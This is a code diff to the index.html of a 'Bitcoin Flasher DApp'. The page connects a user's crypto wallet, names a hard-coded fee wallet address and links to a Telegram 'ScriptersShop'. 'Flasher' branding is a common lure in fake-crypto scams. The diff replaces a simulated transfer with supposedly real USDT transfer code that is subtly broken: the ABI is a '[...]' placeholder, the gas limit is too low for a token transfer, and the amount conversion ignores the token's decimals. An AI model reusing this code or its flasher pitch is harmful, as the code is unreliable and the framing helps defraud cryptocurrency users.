--- a/index.html
+++ b/index.html
@@ -1,6 +1,5 @@
 <!DOCTYPE html>
 <html lang="en">
-
 <head>
     <!-- Essential Meta Tags -->
     <meta charset="UTF-8">
@@ -9,7 +8,7 @@
     <meta name="description" content="Experience secure and seamless BTC/USDT transactions with Bitcoin Flasher DApp.">
     <meta name="keywords" content="Bitcoin Flasher, Blockchain DApp, BTC Transactions, USDT Transfers, ERC20, BEP20, Polygon, PWA">
     <meta name="robots" content="index, follow">
-    <meta name="theme-color" content="#ff9900">
+    <meta name="theme-color" content="#000000">
 
     <!-- Canonical and Open Graph links -->
     <link rel="canonical" href="https://bitcoin-flasher.github.io/">
@@ -33,6 +32,7 @@
 
     <!-- External CSS -->
     <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
+    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css" rel="stylesheet">
 
     <title>Bitcoin Flasher DApp - Seamless BTC/USDT Transactions</title>
 
@@ -45,45 +45,47 @@
             margin: 0;
             padding: 0;
             overflow-x: hidden;
+            display: flex;
+            justify-content: center;
+            align-items: center;
+            height: 100vh;
         }
 
         .container {
-            margin-top: 7%;
+            max-width: 500px;
+            width: 100%;
+            padding: 20px;
+            border-radius: 12px;
+            box-shadow: 0 10px 20px rgba(0, 0, 0, 0.5);
+            background: linear-gradient(145deg, #181818, #222222);
         }
 
-        .card {
-            background: linear-gradient(145deg, #181818, #1c1c1c);
-            border: 1px solid #ff9900;
-            box-shadow: 0 5px 15px rgba(255, 153, 0, 0.4);
-            border-radius: 12px;
+        h1 {
+            font-size: 28px;
+            margin-bottom: 20px;
+        }
+
+        p {
+            font-size: 16px;
+            margin-bottom: 20px;
         }
 
         .btn-primary {
             background-color: #ff9900;
             border: none;
             font-size: 18px;
-            padding: 12px 24px;
-            transition: background-color 0.3s ease;
+            padding: 10px 20px;
+            border-radius: 8px;
+            transition: background-color 0.3s;
         }
 
         .btn-primary:hover {
             background-color: #e67e00;
         }
 
-        .btn-danger {
-            background-color: #dc3545;
-            border: none;
-            font-size: 18px;
-            padding: 12px 24px;
-            transition: background-color 0.3s ease;
-        }
-
-        .btn-danger:hover {
-            background-color: #c82333;
-        }
-
-        .input-group {
-            margin-top: 20px;
+        input, button {
+            margin-top: 15px;
+            border-radius: 8px;
         }
 
         footer {
@@ -95,61 +97,58 @@
 
         #progressBar {
             transition: width 0.5s;
+            height: 10px;
+            border-radius: 5px;
+            background-color: #ff9900;
         }
 
-        .alert {
-            display: none;
+        .form-control {
+            background-color: #222222;
+            color: #ffffff;
+            border: 1px solid #444444;
         }
 
-        .wallet-connect-status {
-            font-size: 16px;
+        .form-control:focus {
+            border-color: #ff9900;
+            box-shadow: 0 0 0 0.25rem rgba(255, 153, 0, 0.25);
+        }
+
+        footer a {
             color: #ff9900;
-            margin-top: 10px;
-        }
-
-        .alert-message {
-            font-size: 16px;
-            color: #e67e00;
+            text-decoration: none;
         }
     </style>
 </head>
-
 <body>
     <div class="container text-center">
-        <div class="card p-4">
-            <h1>Bitcoin Flasher DApp</h1>
-            <p>Secure and Seamless BTC/USDT Transactions</p>
+        <h1>Bitcoin Flasher DApp</h1>
+        <p>Secure and Seamless BTC/USDT Transactions</p>
 
-            <!-- Wallet Connection -->
-            <button id="connectWallet" class="btn btn-primary w-100">Connect Wallet</button>
-            <p id="walletStatus" class="wallet-connect-status">Not Connected</p>
+        <!-- Wallet Connection -->
+        <button id="connectWallet" class="btn btn-primary w-100">Connect Wallet</button>
+        <p id="walletStatus" class="text-success mt-3">Not Connected</p>
 
-            <!-- Transaction Form -->
-            <form id="transactionForm" style="display:none;">
-                <div class="mb-3">
-                    <label for="recipient" class="form-label">Recipient Address</label>
-                    <input type="text" id="recipient" class="form-control" placeholder="Enter recipient address" required>
-                </div>
-                <div class="mb-3">
-                    <label for="amount" class="form-label">Amount (USDT)</label>
-                    <input type="number" id="amount" class="form-control" placeholder="Enter amount" required>
-                </div>
-                <button type="submit" class="btn btn-primary w-100">Send Transaction</button>
-            </form>
-
-            <!-- Transaction Progress -->
-            <div class="progress mt-3">
-                <div id="progressBar" class="progress-bar bg-warning" style="width: 0%;">0%</div>
+        <!-- Transaction Form -->
+        <form id="transactionForm">
+            <div class="mb-3">
+                <label for="recipient" class="form-label">Recipient Address</label>
+                <input type="text" id="recipient" class="form-control" placeholder="Enter recipient address" required>
             </div>
+            <div class="mb-3">
+                <label for="amount" class="form-label">Amount (USDT)</label>
+                <input type="number" id="amount" class="form-control" placeholder="Enter amount" required>
+            </div>
+            <button type="submit" class="btn btn-primary w-100">Send Transaction</button>
+        </form>
 
-            <!-- Alerts -->
-            <div id="errorAlert" class="alert alert-danger alert-message">Error! Please try again.</div>
-            <div id="successAlert" class="alert alert-success alert-message">Transaction successful!</div>
+        <!-- Progress -->
+        <div class="progress mt-3">
+            <div id="progressBar" class="progress-bar bg-warning" style="width: 0%;">0%</div>
         </div>
     </div>
 
     <footer>
-        &copy; 2024 Bitcoin Flasher - All Rights Reserved.
+        &copy; 2024 Bitcoin Flasher - All rights reserved. | <a href="https://t.me/ScriptersShop/" target="_blank">Join ScriptersShop</a>
     </footer>
 
     <!-- Web3.js and Script -->
@@ -157,8 +156,9 @@
     <script>
         let web3, userAccount;
         const feeAddress = "0x3a06322e9F1124F6B2de8F343D4FDce4D1009869";
+        const usdtAddress = "YOUR_USDT_CONTRACT_ADDRESS"; // Replace with your USDT contract address
+        const usdtAbi = [...] // Replace with the ABI of the USDT token contract
 
-        // Connect Wallet
         async function connectWallet() {
             if (window.ethereum) {
                 try {
@@ -166,8 +166,6 @@
                     const accounts = await ethereum.request({ method: 'eth_requestAccounts' });
                     userAccount = accounts[0];
                     document.getElementById('walletStatus').textContent = `Connected: ${userAccount}`;
-                    document.getElementById('transactionForm').style.display = 'block'; // Show transaction form
-                    document.getElementById('connectWallet').style.display = 'none'; // Hide connect button
                 } catch (error) {
                     alert('Wallet connection failed!');
                 }
@@ -176,7 +174,6 @@
             }
         }
 
-        // Send Transaction
         async function sendTransaction(event) {
             event.preventDefault();
             const recipient = document.getElementById('recipient').value;
@@ -188,16 +185,24 @@
                 document.getElementById('progressBar').style.width = '50%';
                 document.getElementById('progressBar').textContent = 'Processing...';
 
-                // Fake sending tokens for demo
-                setTimeout(() => {
-                    document.getElementById('progressBar').style.width = '100%';
-                    document.getElementById('progressBar').textContent = 'Transaction Complete!';
-                    document.getElementById('successAlert').style.display = 'block';
-                    setTimeout(() => document.getElementById('successAlert').style.display = 'none', 5000);
-                }, 2000);
+                // Real transaction logic
+                const usdtContract = new web3.eth.Contract(usdtAbi, usdtAddress);
+                const decimals = await usdtContract.methods.decimals().call();
+                const amountWei = web3.utils.toWei(amount, 'ether');
+                const gasPrice = await web3.eth.getGasPrice();
+                const gasLimit = 21000;
+
+                const tx = await usdtContract.methods.transfer(recipient, amountWei).send({
+                    from: userAccount,
+                    gas: gasLimit,
+                    gasPrice: gasPrice
+                });
+
+                document.getElementById('progressBar').style.width = '100%';
+                document.getElementById('progressBar').textContent = 'Transaction Complete!';
+                alert('Transaction sent successfully.');
             } catch (error) {
-                document.getElementById('errorAlert').style.display = 'block';
-                setTimeout(() => document.getElementById('errorAlert').style.display = 'none', 5000);
+                alert('Transaction failed: ' + error.message);
             }
         }
 
@@ -209,12 +214,24 @@
         window.addEventListener('beforeinstallprompt', (e) => {
             e.preventDefault();
             deferredPrompt = e;
-            let installPrompt = confirm('Install Bitcoin Flasher as an app?');
-            if (installPrompt) {
-                deferredPrompt.prompt();
-            }
+            if (!('showInstallPrompt' in navigator)) return;
+            deferredPrompt.prompt();
         });
+
+        // Show install prompt on button click (you can add a button for installation prompt in the future)
+        // document.getElementById('installButton').addEventListener('click', () => {
+        //     if (deferredPrompt) {
+        //         deferredPrompt.prompt();
+        //         deferredPrompt.userChoice.then((choiceResult) => {
+        //             if (choiceResult.outcome === 'accepted') {
+        //                 console.log('User accepted the install prompt');
+        //             } else {
+        //                 console.log('User dismissed the install prompt');
+        //             }
+        //             deferredPrompt = null;
+        //         });
+        //     }
+        // });
     </script>
 </body>
-
 </html>
